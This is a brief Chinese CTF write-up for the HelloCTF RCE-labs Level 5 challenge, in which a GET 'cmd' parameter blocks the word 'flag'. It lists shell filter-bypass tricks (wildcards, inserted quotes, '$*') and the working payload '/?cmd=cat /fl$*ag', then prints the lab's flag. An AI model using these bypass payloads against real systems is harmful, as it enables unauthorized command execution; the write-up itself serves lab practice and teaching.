HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
石像鬼₧魂石5 小时前
内网渗透是网络安全渗透测试
安全·web安全
保持低旋律节奏6 小时前
linux——进程状态
android·linux·php
计算机学姐7 小时前
基于php的摄影网站系统
开发语言·vue.js·后端·mysql·php·phpstorm
Neolnfra7 小时前
渗透测试标准化流程
开发语言·安全·web安全·http·网络安全·https·系统安全
计算机学姐7 小时前
基于php的旅游景点预约门票管理系统
开发语言·后端·mysql·php·phpstorm
.昕..8 小时前
2025CTF逆向工程“新范式”:当Jadx装上AI大脑,逆向效率提升
网络安全
百***07458 小时前
GPT-5.2国内稳定接入实战指南:中转调用全链路方案(Python适配)
python·gpt·php
云计算练习生9 小时前
渗透测试行业术语扫盲(第十六篇)—— 红蓝对抗与演练类
网络·安全·网络安全·信息安全·渗透测试术语
小阿宁的猫猫10 小时前
sqlmap的使用
sql·网络安全·php
roman_日积跬步-终至千里10 小时前
【Starrocks】StarRocks 排错:`Invalid method name: ‘heartbeat‘`(BE 心跳端口/协议错误)
服务器·网络·php